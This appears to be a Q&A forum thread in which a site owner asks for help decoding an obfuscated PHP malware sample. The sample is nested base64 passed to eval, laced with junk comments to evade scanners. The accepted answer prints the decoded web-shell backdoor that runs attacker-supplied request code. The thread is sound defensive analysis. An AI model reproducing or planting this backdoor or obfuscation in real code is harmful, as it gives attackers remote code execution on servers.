# Eval PHP Hack Cannot decode code

Tags: php, base64, eval

I Have read a lot on the normal php eval with the base64_encoder and was able to decode much of the infected php files.

With that said, I have this one file that does not follow standard eval call and I would like some help from the community.

Can anyone decode and/or tell me whats happening in the code?

Thanks,
--Eric

```
<?php /*vg!*/eval/*E}--oP8*/(/*pxHO*/base64_decode/*vgKGm*/(/*0%C*/'LypPSnBvKi9ldmFsLypGUSZRX00qLygvKk56SiovYmFzZTY0X2RlY29kZS8qPDU+cyovKC8qTVl5YnMqLydMeW91U
EZJcUwybG1MeXBiY0h0aFZTb3ZLQzhxZCcvKndLc2Q/PGgqLy4vKllcdkgqLycweHVYRFJvTkNvdmFYTnpaWFF2S2sxTVBDb3ZLQycvKiF9Z1sqLy4vKiBrVlQqLyc4cWRYMHJLaThrWDFKRlVWVkZVMVF2S2
54Mk9DdCcvKjlRSG1Ta1FIKi8uLypFYlMuaCovJ2VNRHM4S2k5Ykx5cHNkSFlxTHlkakp5OHFkMmRHJy8qQUI5Ki8uLypxcyFIZU4qLydlQ292TGk4cVFsVXpObElxTHlkdUp5OHFjRGw0SScvKiY6ZSovLi8
qSlVxKi8nVU51S2k4dUx5b3hYQ1o2S2k4bmVTY3ZLbU10Sz'/*0B>.'&CK*/./*W1H*/'MnLypxcFpJKi8uLypBKWVTKi8nQlNLaTh1THlwa2JqRTFKVG9xTHlkemNTY3ZLa2QnLypgZj5zZTgqLy4vKjlENT
FcTyovJ0ROVGxWS2k5ZEx5cFRORXc1S2k4dkttaytXVE1vJy8qOmBaRUtlJkUqLy4vKlVILjspZSovJ1pTb3ZLUzhxT1RCbFVsWlZLaTh2S2xaSmRTVkpmJy8qVzpMa2hUKi8uLyo1cTNmdT8qLydDb3ZLUzh
xTlZvM0ppb3ZaWFpoYkM4cVp5MWNTMCcvKmheXTtbICovLi8qTC5SS2JZKi8nY3FMeWd2S21KNFZVNHllU292YzNSeWFYQnpiR0YnLypTS2MuJSovLi8qb3MwXjUySHsqLyd6YUdWekx5cGVWVjUzYnlvdktD
OHFKMk00SjBvcScvKlJrSCEqLy4vKk41JjkqLydMeVJmVWtW'/*Ju%:AN*/./*0\`a Z=*/'UlZVVlRWQzhxUUNoZGF5b3ZXeThxTCcvKjw8J3guaCovLi8qbixXKi8nV1JXZXpKSFB6QXFMeWRqYmljdktpMX
JlVkpKS2knLyotVS5zKi8uLyogUl5OKi8nOHVMeXBFVnpKYVoyRXFMeWQ1YzNFbkx5bzRTMFknLypjWmsqLy4vKjNkeWVMKi8naElEb3lRU292WFM4cU5peDZkU292THlwdlNVSngnLyonQVJWdyl1Ki8uLyp
eX1pKOmZ2Ki8nVVNvdktTOHFNV0JqS1V3cUx5OHFiMVU4T2tzcUwnLypUdlQrJkYqLy4vKmtFPDNmISovJ3lrdktsVkllMnNsS2k4dktsWmhVaTVUS3lvdk95OHFKbHhoZlN4MEtpOD0nLypaKWVePyovKS8q
J2tYKi8vKmsmViovKS8qMWdFVyovLyo8OHhObSovOy8qXW8/Ki8='/*L,}I*/)/*8Oyj*//*uEGgU*/)/*+LT*//*Q?.e*/;/*oGCkBv*/ ?>
```

Comment: it's base64 encoded (probably with parts of if multiple times) with php comments interspersed through it.

Answer (score 4, accepted):

If you go all the way down the rabbit hole, you get the following command.

```
if(isset($_REQUEST['cnysq']))eval(stripslashes($_REQUEST['cnysq']));
```

If you open the code up in a visual editor, you'll see there are a lot of comments.  Remove those, and you'll see that it's a bas64 encoded string.
Decode that, and you'll see more of the same.
Keep removing comments and concatenating strings and after about 3 levels, you get to this point.

Answer (score 2):

It's just a bunch of PHP comments in there, e.g. from the first line:

```
<?php /*vg!*/eval/*E}--oP8*/(/*pxHO*/base64_decode/*vgKGm*/(/*0%C*/'LypPSnB etc...
      ^^^^^^^    ^^^^^^^^^^^ ^^^^^^^^             ^^^^^^^^^ ^^^^^^^--comments
```

is really just

```
<?php eval(base64_decode('LyPSnB  etc...
```

Comment: And then the usual nested eval/base64 sequence. It seems that in all steps there are additional comments inserted.

Comment: that's just to further obfuscate the code. given the comments are ignore by php, any random garbage in the comments is probably enough to fool most virus scanners.